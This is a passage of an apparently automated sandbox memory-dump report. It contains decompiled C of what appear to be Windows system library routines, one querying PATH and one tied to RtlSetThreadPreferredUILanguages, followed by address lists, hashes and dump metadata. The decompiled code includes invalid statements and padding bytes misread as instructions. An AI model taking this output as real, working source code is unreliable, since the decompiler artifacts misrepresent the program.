													__eax = ( *0x50b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0500F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0500F3E0(_t330, _v76, _v36);
														_t271 = _v36;
													}
													L26:
													_t344 = _t344 + 0xc;
													_t330 = _t330 + (_t271 >> 1) * 2 + 2;
													__eflags = _t330;
													L27:
													_push(0x3b);
													_pop(_t273);
													 *((short*)(_t330 - 2)) = _t273;
													goto L28;
												case 6:
													__ebx =  *0x50b575c;
													__eflags = __ebx - 0x50b575c;
													if(__ebx != 0x50b575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0500F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x50b575c;
														} while (__ebx != 0x50b575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x50b8478 & 0x0000ffff = E0500F3E0(__edi,  *0x50b847c,  *0x50b8478 & 0x0000ffff);
													__eax =  *0x50b8478 & 0x0000ffff;
													__eax = ( *0x50b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E050539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x50b6e58 & 0x0000ffff = E0500F3E0(__edi,  *0x50b6e5c,  *0x50b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x50b6e58 & 0x0000ffff;
													__eax = ( *0x50b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t301 = _v16;
													_t317 = _v32;
													L29:
													_t286 = _t286 + 4;
													__eflags = _t286;
													_v56 = _t286;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t301 = _t301 + 1;
									_v16 = _t301;
									__eflags = _t301 - _v48;
								} while (_t301 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t328 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M04FF2935))) {
							case 0:
								__ax =  *0x50b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t317 =  &_v64;
								_v80 = E04FF2E3E(0,  &_v64);
								_t282 = _t282 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x50b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x50b8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04FDEEF0(0x50b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04FDEB70(__ecx, 0x50b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t337;
												if(_t337 < 0) {
													L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t297 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x50b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04FDEB70(__ecx, 0x50b79a0);
										__eax = _v52;
										L36:
										_pop(_t329);
										_pop(_t338);
										__eflags = _v8 ^ _t341;
										_pop(_t283);
										return E0500B640(_t212, _t283, _v8 ^ _t341, _t317, _t329, _t338);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t278 = _v56;
								if(_v56 != 0) {
									_t317 =  &_v36;
									_t280 = E04FF2E3E(_t278,  &_v36);
									_t297 = _v36;
									_v76 = _t280;
								}
								if(_t297 == 0) {
									goto L44;
								} else {
									_t282 = _t282 + 2 + _t297;
								}
								goto L14;
							case 6:
								__eax =  *0x50b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x50b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x50b8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x50b6e58 & 0x0000ffff;
								__eax = ( *0x50b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t328 = _t328 + 1;
								if(_t328 >= _v48) {
									goto L16;
								} else {
									_t317 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t336 =  *_t336 + 1;
					asm("daa");
					 *((intOrPtr*)(_t336 + _t341)) =  *((intOrPtr*)(_t336 + _t341)) + 1;
					 *[es:esi+eax*2] =  *[es:esi+eax*2] + 1;
					 *[es:edi+ebx] =  *[es:edi+ebx] + 1;
					asm("daa");
					 *_t336 =  *_t336 + 1;
					asm("daa");
					 *((intOrPtr*)((_t237 + 0xe5 +  *0x4ff2894 ^ 0x0205035b) + 0x221)) =  *((intOrPtr*)((_t237 + 0xe5 +  *0x4ff2894 ^ 0x0205035b) + 0x221)) + 1;
					_t293 = 0x25;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x509ff00);
					E0501D08C(_t293, 0, _t336);
					_v44 =  *[fs:0x18];
					_t332 = 0;
					 *_a24 = 0;
					_t294 = _a12;
					__eflags = _t294;
					if(_t294 == 0) {
						_t251 = 0xc0000100;
					} else {
						_v8 = 0;
						_t339 = 0xc0000100;
						_v52 = 0xc0000100;
						_t253 = 4;
						while(1) {
							_v40 = _t253;
							__eflags = _t253;
							if(_t253 == 0) {
								break;
							}
							_t307 = _t253 * 0xc;
							_v48 = _t307;
							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0x4fa1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t268 = E0500E5C0(_a8,  *((intOrPtr*)(_t307 + 0x4fa1668)), _t294);
									_t344 = _t344 + 0xc;
									__eflags = _t268;
									if(__eflags == 0) {
										_t339 = E050451BE(_t294,  *((intOrPtr*)(_v48 + 0x4fa166c)), _a16, _t332, _t339, __eflags, _a20, _a24);
										_v52 = _t339;
										break;
									} else {
										_t253 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t253 = _t253 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t339;
						__eflags = _t339;
						if(_t339 < 0) {
							__eflags = _t339 - 0xc0000100;
							if(_t339 == 0xc0000100) {
								_t303 = _a4;
								__eflags = _t303;
								if(_t303 != 0) {
									_v36 = _t303;
									__eflags =  *_t303 - _t332;
									if( *_t303 == _t332) {
										_t339 = 0xc0000100;
										goto L76;
									} else {
										_t319 =  *((intOrPtr*)(_v44 + 0x30));
										_t255 =  *((intOrPtr*)(_t319 + 0x10));
										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t303;
										if( *((intOrPtr*)(_t255 + 0x48)) == _t303) {
											__eflags =  *(_t319 + 0x1c);
											if( *(_t319 + 0x1c) == 0) {
												L106:
												_t339 = E04FF2AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
												_v32 = _t339;
												__eflags = _t339 - 0xc0000100;
												if(_t339 != 0xc0000100) {
													goto L69;
												} else {
													_t332 = 1;
													_t303 = _v36;
													goto L75;
												}
											} else {
												_t258 = E04FD6600( *(_t319 + 0x1c));
												__eflags = _t258;
												if(_t258 != 0) {
													goto L106;
												} else {
													_t303 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t339 = E04FF2C50(_t303, _a8, _t294, _a16, _a20, _a24, _t332);
											L76:
											_v32 = _t339;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04FDEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t339 = _a24;
									_t265 = E04FF2AE4( &_v36, _a8, _t294, _a16, _a20, _t339);
									_v32 = _t265;
									__eflags = _t265 - 0xc0000100;
									if(_t265 == 0xc0000100) {
										_v32 = E04FF2C50(_v36, _a8, _t294, _a16, _a20, _t339, 1);
									}
									_v8 = _t332;
									E04FF2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t251 = _t339;
					}
					L70:
					return E0501D0D1(_t251);
				}
				L108:
			}

0x04ff2584
0x04ff2586
0x04ff2590
0x04ff2596
0x04ff2597
0x04ff2598
0x04ff2599
0x04ff259e
0x04ff25a4
0x04ff25a9
0x04ff25ac
0x04ff25ae
0x04ff25b1
0x04ff25b2
0x04ff25b5
0x04ff25b8
0x04ff25bb
0x04ff25bc
0x04ff25bf
0x04ff25c2
0x04ff25c5
0x04ff25c6
0x04ff25cb
0x04ff25ce
0x04ff25d8
0x04ff25db
0x04ff25dd
0x04ff25de
0x04ff25e1
0x04ff25e3
0x04ff25e9
0x04ff26da
0x04ff26da
0x04ff26dd
0x04ff26e2
0x05035b56
0x00000000
0x04ff26e8
0x04ff26f9
0x04ff26fb
0x04ff26fe
0x04ff2700
0x05035b60
0x00000000
0x04ff2706
0x04ff2706
0x04ff270a
0x04ff270a
0x04ff270d
0x04ff2713
0x04ff2716
0x04ff2718
0x04ff271c
0x04ff271e
0x05035b6c
0x05035b6f
0x05035b7f
0x05035b89
0x05035b8e
0x05035b93
0x05035b96
0x05035b9c
0x05035ba0
0x05035ba3
0x05035bab
0x05035bb0
0x05035bb3
0x05035bb3
0x05035ba3
0x04ff2724
0x04ff2726
0x04ff2729
0x04ff272c
0x04ff279d
0x04ff279d
0x04ff27a0
0x04ff27a2
0x00000000
0x04ff272e
0x04ff272e
0x04ff2731
0x04ff2734
0x04ff2734
0x04ff2736
0x05035bc1
0x05035bc1
0x05035bc4
0x00000000
0x05035bca
0x05035bca
0x05035bcd
0x00000000
0x05035bd3
0x00000000
0x05035bd3
0x05035bcd
0x04ff273c
0x04ff273c
0x04ff2742
0x04ff2747
0x04ff274a
0x04ff274d
0x04ff2750
0x00000000
0x04ff2756
0x04ff2756
0x00000000
0x04ff2902
0x04ff2908
0x04ff290b
0x00000000
0x04ff2911
0x04ff291c
0x04ff2921
0x00000000
0x04ff2921
0x00000000
0x00000000
0x04ff2880
0x04ff2887
0x04ff288c
0x00000000
0x00000000
0x04ff2805
0x04ff280a
0x04ff2814
0x04ff2816
0x00000000
0x00000000
0x04ff281e
0x04ff2821
0x04ff2823
0x00000000
0x04ff2829
0x04ff2829
0x04ff2831
0x04ff283c
0x04ff283e
0x00000000
0x04ff283e
0x00000000
0x00000000
0x04ff284e
0x04ff2850
0x04ff2851
0x04ff2854
0x04ff2857
0x04ff285a
0x04ff285c
0x04ff285d
0x00000000
0x00000000
0x04ff275d
0x04ff2761
0x00000000
0x04ff2767
0x04ff276e
0x04ff2773
0x04ff2773
0x04ff2776
0x04ff2778
0x04ff277e
0x04ff277e
0x04ff2781
0x04ff2781
0x04ff2783
0x04ff2784
0x00000000
0x00000000
0x05035bd8
0x05035bde
0x05035be4
0x05035be6
0x05035be8
0x05035be9
0x05035bee
0x05035bf8
0x05035bff
0x05035c01
0x05035c04
0x05035c07
0x05035c0b
0x05035c0d
0x05035c0d
0x05035c15
0x05035c18
0x05035c1b
0x05035c1b
0x05035c1e
0x00000000
0x00000000
0x04ff28c3
0x04ff28c8
0x04ff28d2
0x04ff28d4
0x04ff28d8
0x04ff28db
0x05035c26
0x05035c28
0x05035c2d
0x05035c2d
0x00000000
0x00000000
0x05035c34
0x05035c36
0x05035c49
0x05035c4e
0x05035c54
0x05035c5b
0x05035c5d
0x05035c60
0x04ff2788
0x04ff2788
0x04ff278b
0x04ff278e
0x04ff278e
0x04ff278e
0x04ff2791
0x00000000
0x00000000
0x04ff2756
0x04ff2750
0x00000000
0x04ff2794
0x04ff2794
0x04ff2795
0x04ff2798
0x04ff2798
0x00000000
0x04ff2734
0x04ff272c
0x04ff2700
0x04ff25ef
0x04ff25ef
0x04ff25ef
0x04ff25f2
0x04ff25f8
0x00000000
0x00000000
0x04ff25fe
0x00000000
0x04ff28e6
0x04ff28ec
0x04ff28ef
0x04ff28f5
0x04ff28f8
0x04ff28f8
0x00000000
0x04ff28f8
0x00000000
0x00000000
0x04ff2866
0x04ff2866
0x04ff2876
0x04ff2879
0x00000000
0x00000000
0x04ff27e0
0x04ff27e7
0x04ff27e9
0x04ff27eb
0x05035afd
0x00000000
0x05035afd
0x00000000
0x00000000
0x04ff2633
0x04ff2638
0x04ff263b
0x04ff263c
0x04ff263e
0x04ff2640
0x04ff2642
0x04ff2647
0x04ff2649
0x04ff264e
0x04ff2650
0x04ff2653
0x04ff2659
0x04ff26a2
0x04ff26a7
0x04ff26ac
0x04ff26b2
0x05035b11
0x05035b15
0x05035b17
0x00000000
0x04ff26b8
0x04ff26b8
0x04ff26ba
0x04ff27a6
0x04ff27a6
0x04ff27a9
0x04ff27ab
0x04ff27b9
0x04ff27b9
0x04ff27be
0x04ff27c1
0x04ff27c3
0x04ff27c5
0x04ff27c7
0x05035c74
0x05035c79
0x05035c79
0x04ff27c7
0x00000000
0x04ff26c0
0x04ff26c0
0x04ff26c3
0x04ff26c6
0x04ff26c6
0x04ff26c9
0x04ff26c9
0x00000000
0x04ff26c9
0x04ff26ba
0x04ff265b
0x04ff265b
0x04ff265e
0x04ff2667
0x04ff266d
0x04ff2677
0x04ff267c
0x04ff267f
0x04ff2681
0x05035b49
0x05035b4e
0x04ff27cd
0x04ff27d0
0x04ff27d1
0x04ff27d2
0x04ff27d4
0x04ff27dd
0x04ff2687
0x04ff2687
0x04ff268a
0x04ff268b
0x04ff268e
0x04ff268f
0x04ff2691
0x04ff2696
0x04ff2698
0x04ff269d
0x04ff269f
0x00000000
0x04ff269f
0x04ff2681
0x00000000
0x00000000
0x04ff2846
0x00000000
0x00000000
0x04ff2605
0x04ff260a
0x04ff260c
0x04ff2611
0x04ff2616
0x04ff2619
0x04ff2619
0x04ff261e
0x00000000
0x04ff2624
0x04ff2627
0x04ff2627
0x00000000
0x00000000
0x05035b1f
0x00000000
0x00000000
0x04ff2894
0x04ff289b
0x04ff289d
0x04ff28a1
0x05035b2b
0x05035b2e
0x05035b2e
0x04ff28a7
0x04ff28a9
0x05035b04
0x05035b09
0x05035b09
0x05035b09
0x00000000
0x00000000
0x05035b35
0x05035b3c
0x04ff28fb
0x04ff28fb
0x04ff26cc
0x04ff26cc
0x04ff26d0
0x00000000
0x04ff26d2
0x04ff26d2
0x00000000
0x04ff26d2
0x00000000
0x00000000
0x04ff25fe
0x04ff292d
0x04ff2930
0x04ff2935
0x04ff2937
0x04ff293e
0x04ff293f
0x04ff2942
0x04ff294a
0x04ff2962
0x04ff2963
0x04ff296e
0x04ff296f
0x04ff2972
0x04ff2981
0x04ff2982
0x04ff2983
0x04ff2984
0x04ff2985
0x04ff2986
0x04ff2987
0x04ff2988
0x04ff2989
0x04ff298a
0x04ff298b
0x04ff298c
0x04ff298d
0x04ff298e
0x04ff298f
0x04ff2990
0x04ff2992
0x04ff2997
0x04ff29a3
0x04ff29a6
0x04ff29ab
0x04ff29ad
0x04ff29b0
0x04ff29b2
0x05035c80
0x04ff29b8
0x04ff29b8
0x04ff29bb
0x04ff29c0
0x04ff29c5
0x04ff29c6
0x04ff29c6
0x04ff29c9
0x04ff29cb
0x00000000
0x00000000
0x04ff29cd
0x04ff29d0
0x04ff29d9
0x04ff29db
0x04ff29dd
0x04ff2a7f
0x04ff2a84
0x04ff2a87
0x04ff2a89
0x05035ca1
0x05035ca3
0x00000000
0x04ff2a8f
0x04ff2a8f
0x00000000
0x04ff2a8f
0x00000000
0x04ff29e3
0x04ff29e3
0x04ff29e3
0x00000000
0x04ff29e3
0x04ff29dd
0x00000000
0x04ff29db
0x04ff29e6
0x04ff29e9
0x04ff29eb
0x04ff29ed
0x04ff29f3
0x04ff29f5
0x04ff29f8
0x04ff29fa
0x04ff2a97
0x04ff2a9a
0x04ff2a9d
0x04ff2add
0x00000000
0x04ff2a9f
0x04ff2aa2
0x04ff2aa5
0x04ff2aa8
0x04ff2aab
0x05035cab
0x05035caf
0x05035cc5
0x05035cda
0x05035cdc
0x05035cdf
0x05035ce5
0x00000000
0x05035ceb
0x05035ced
0x05035cee
0x00000000
0x05035cee
0x05035cb1
0x05035cb4
0x05035cb9
0x05035cbb
0x00000000
0x05035cbd
0x05035cbd
0x00000000
0x05035cbd
0x05035cbb
0x04ff2ab1
0x04ff2ab1
0x04ff2ac4
0x04ff2ac6
0x04ff2ac6
0x00000000
0x04ff2ac6
0x04ff2aab
0x00000000
0x04ff2a00
0x04ff2a09
0x04ff2a0e
0x04ff2a21
0x04ff2a24
0x04ff2a35
0x04ff2a3a
0x04ff2a3d
0x04ff2a42
0x04ff2a59
0x04ff2a59
0x04ff2a5c
0x04ff2a5f
0x04ff2a5f
0x04ff29fa
0x04ff29f3
0x04ff2a64
0x04ff2a64
0x04ff2a6b
0x04ff2a6b
0x04ff2a6d
0x04ff2a72
0x04ff2a72
0x00000000

Strings

PATH, xrefs: 04FF2642, 04FF2691

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 3637b689d0a07b830683440825f3d734ce4e3d2e4042cf81b55c68541caf7a1c
Instruction ID: a0751ce38129bf5ac8cac513cde83f457cfa26327fcb3064f338e19f72b0fa22
Opcode Fuzzy Hash: 3637b689d0a07b830683440825f3d734ce4e3d2e4042cf81b55c68541caf7a1c
Instruction Fuzzy Hash: 1CC1A272E10609DBDB24DF99DC81BFEB7B5FF48700F054069E901AB2A0E775A942DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04FFFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04FFFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04FDEEF0(0x50b7b60);
					_t134 =  *0x50b7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x50b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x50b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04FD6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04FD76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05068938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04FCB150();
													}
													_t116 = E05066D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04FD75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x50b8638; // 0x3212100
																	_t122 = L04FD38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04FD76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04FD76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04FFFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04FD70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04FFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04FFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04FFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04FFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04FFFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x50b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x50b7b84 = _t75;
						_t73 = E04FDEB70(_t134, 0x50b7b60);
						if( *0x50b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04FDFF60( *0x50b7b20);
							}
						}
						goto L5;
					}
				}
			}

